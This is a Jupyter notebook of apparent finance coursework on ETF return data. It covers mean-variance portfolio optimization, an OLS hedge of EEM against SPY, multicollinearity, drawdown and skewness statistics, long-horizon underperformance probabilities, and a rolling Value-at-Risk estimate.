df_merrill_excess_2018 = df_merrill_excess.loc[:'2018',:]
df_merrill_excess_annualized_2018 = df_merrill_excess_2018*12
delta_2018, w_p_star_2018 = target_mv_portfolio(df_merrill_excess_annualized_2018, 0.02*12)
print(delta) # this is how much it is allocated to the portfolio
w_p_star_2018.to_frame('MV Weights')
# performance measure up to 2018
performance_measure(w_p_star_2018, df_merrill_excess_2018, 12)
# performance measure out of sample from 2019 to 2021
df_merrill_excess_2019 = df_merrill_excess.loc['2019':'2021', :]
performance_measure(w_p_star_2018, df_merrill_excess_2019, 12)
###Output
mean 0.3531 vol 0.2387 sharpe ratio 1.479
###Markdown
Question 5

Compared to the 5 risky assets, according to Google, commodities tend to be one of the most volatile asset classes (more volatile than the 5 risky assets). Because of this, the out-of-sample fragility problem would be worse than what we have seen optimizing equities, because MV optimization is sensitive to the historical mean returns and covariance matrix. If commodities are volatile, the historical mean returns and covariance matrix may not reflect current/future conditions, which escalates the issue for commodities.

Section 3

Question 1

Assuming we use excess returns
###Code
X = df_merrill_excess['SPY US Equity']
y = df_merrill_excess['EEM US Equity']
results = sm.OLS(y,X,missing='drop').fit()
results.summary()
###Output
_____no_output_____
###Markdown
For every dollar invested in EEM, I would hold −0.9257 dollars of SPY for the hedged position (this is the negative of the beta coefficient of SPY in the regression, because the beta coefficient of SPY gives the replication).

Question 2
###Code
hedged = results.resid # hedged position would just be y - X*beta which is just the residual
hedged
# df is dataframe
# annual_factor is 12 for monthly data
def summary_stats(df, annual_factor):
df_annual = df*annual_factor
mu = df_annual.mean()
# sigma should be annualized by multiplying sqrt from the monthly std -> sigma = df.std()*np.sqrt(12)
# which is equivalent to doing this:
sigma = df_annual.std()/np.sqrt(12)
sharpe = mu/sigma
table = pd.DataFrame({'Mean':mu, 'Volatility':sigma, 'Sharpe':sharpe}).sort_values(by='Sharpe')
return(table)
summary_stats(pd.DataFrame(hedged), 12)
###Output
_____no_output_____
###Markdown
Question 3

No, it does not have the same mean, because the hedge also removes beta times the mean of SPY. The hedged position also lowers the volatility of EEM.
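To make this concrete (a restatement of the no-intercept regression above): the hedged return is $\epsilon_t = r^{EEM}_t - \beta\, r^{SPY}_t$, so its mean is $\mu_{EEM} - \beta\,\mu_{SPY}$, which equals $\mu_{EEM}$ only when $\beta\,\mu_{SPY} = 0$.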
###Code
summary_stats(df_merrill_excess, 12)
###Output
_____no_output_____
###Markdown
Question 4

If we estimated a multifactor regression with IWM and SPY, this regression might be difficult to use, especially out of sample, because of the high correlation (0.88) between SPY and IWM. Therefore, we cannot trust these regression coefficients very much, as there is a multicollinearity issue.
###Code
def correlation(df):
corr = df.corr()
sns.heatmap(data=corr, cmap = 'Blues', annot=True)
# make diagonals NaN
corr[corr == 1] = None
# rank the correlations and find min and max
corr_rank = corr.unstack().sort_values().dropna()
pair_max = corr_rank.index[-1]
pair_min = corr_rank.index[0]
print(f'MIN Correlation pair is {pair_min}')
print(f'MAX Correlation pair is {pair_max}')
correlation(df_merrill_excess)
# doing the actual regression
X = df_merrill_excess[['SPY US Equity', 'IWM US Equity']]
y = df_merrill_excess['EEM US Equity']
results = sm.OLS(y,X,missing='drop').fit()
results.summary()
###Output
_____no_output_____
###Markdown
Section 4

Question 1
###Code
df_merrill_annualized = df_merrill*12
df_merrill.head()
correlation(df_merrill)
# Descriptive Analysis
summary_stats(df_merrill, 12)
def maximum_drawdown(x):
cum_ret = (1+x).cumprod()
rolling_max = cum_ret.cummax()
drawdown = (cum_ret - rolling_max)/rolling_max
# Find the maximum drawdown
MDD = min(drawdown)
# Find the min date
#print(drawdown.argmin())
#min_date = np.argmin(drawdown)
min_date = drawdown.idxmin() # this is same as argmin but no warnings
# Find the max and recovery date
drawdown_0 = drawdown[drawdown == 0].index # dates with 0 drawdown
max_date = drawdown_0[drawdown_0 < min_date][-1] # last date with drawdown 0 < min date
try:
recovery_date = drawdown_0[drawdown_0 > min_date][0] # first date with drawdown 0 > min date
except:
recovery_date = None
return MDD, min_date, max_date, recovery_date
def other_stats(data):
output = pd.DataFrame(index=data.columns, columns = \
['skewness', 'excess kurtosis', 'VaR(0.05)', 'CVaR(0.05)', 'MDD', 'Peak', 'Bottom', 'Recover'])
output.loc[:,'skewness'] = data.skew()
kurtosis = data.kurtosis()
output.loc[:,'excess kurtosis'] = kurtosis
VaR = data.quantile(0.05)
output.loc[:,'VaR(0.05)'] = VaR
output.loc[:,'CVaR(0.05)'] = data[data <= VaR].mean()
for hf in data.columns:
MDD, bottom, peak, recover = maximum_drawdown(data[hf])
output.loc[hf, 'MDD'] = MDD
output.loc[hf, 'Peak'] = peak
output.loc[hf, 'Bottom'] = bottom
output.loc[hf, 'Recover'] = recover
try:
output.loc[hf, 'Days to Recover'] = recover-peak
except:
output.loc[hf, 'Days to Recover'] = None
return(output)
# Other statistics measures
other_stats(df_merrill)
df_log_merrill = np.log(df_merrill + 1)
df_log_merrill.head() # log returns
###Output
_____no_output_____
###Markdown
What we want to know is how probable it is that SPY outperforms EFA, which amounts to computing P(SPY > EFA) = P(SPY − EFA > 0).
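Spelling out the model behind the code below: treating the annual log-return difference as i.i.d. $\mathcal{N}(\tilde\mu, \tilde\sigma^2)$, the cumulative difference over $h$ years is $\mathcal{N}(h\tilde\mu,\, h\tilde\sigma^2)$, so the shortfall probability is $P(\text{SPY underperforms over } h) = \Phi\!\left(-\sqrt{h}\,\tilde\mu/\tilde\sigma\right)$; this is exactly what the function `p(h, tilde_mu, tilde_sigma)` computes.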
###Code
df_log_diff = df_log_merrill['SPY US Equity'] - df_log_merrill['EFA US Equity']
df_log_diff.head() # this is the difference of log SPY and log EFA
summary_stats(pd.DataFrame(df_log_diff), 12) # summary statistics
# h is time frame in years
table4 = pd.DataFrame(columns=['h', 'tilde_mu_hat'])
table4['h'] = list(range(2, 31, 2))
table4 = table4.set_index('h')
def p(h, tilde_mu, tilde_sigma):
x = - np.sqrt(h) * tilde_mu / tilde_sigma
val = scipy.stats.norm.cdf(x)
return val
tilde_mu = 0.081056
tilde_sigma = 0.074502
table4['tilde_mu_hat'] = p(table4.index, tilde_mu=tilde_mu, tilde_sigma=tilde_sigma)
table4.T.style
###Output
_____no_output_____
###Markdown
The table above gives, for each horizon h, the probability that SPY underperforms EFA (the shortfall probability computed by `p`). At h = 10 this is about 0.000290, which is tiny, so under this model we would be quite confident that SPY outperforms EFA over the next 10 years. The shortfall probability keeps decreasing as h grows, since the estimated mean of the log-return difference is positive.
###Code
m = 60
sigma_roll = df_log_merrill['EFA US Equity'].shift(1).dropna().rolling(m).apply(lambda x: ((x**2).sum()/m)**(0.5), raw=False).dropna()
sigma_roll
plt.plot(sigma_roll)
plt.title('sigma rolling') # just plotting
multiplier = scipy.stats.norm.ppf(0.01)
multiplier
VaR_roll = multiplier*sigma_roll
VaR_roll
plt.plot(VaR_roll)
plt.title('Value at Risk at 1%')
VaR_roll_sep_2021 = VaR_roll['2021-09-30']
VaR_roll_sep_2021
###Output
_____no_output_____ |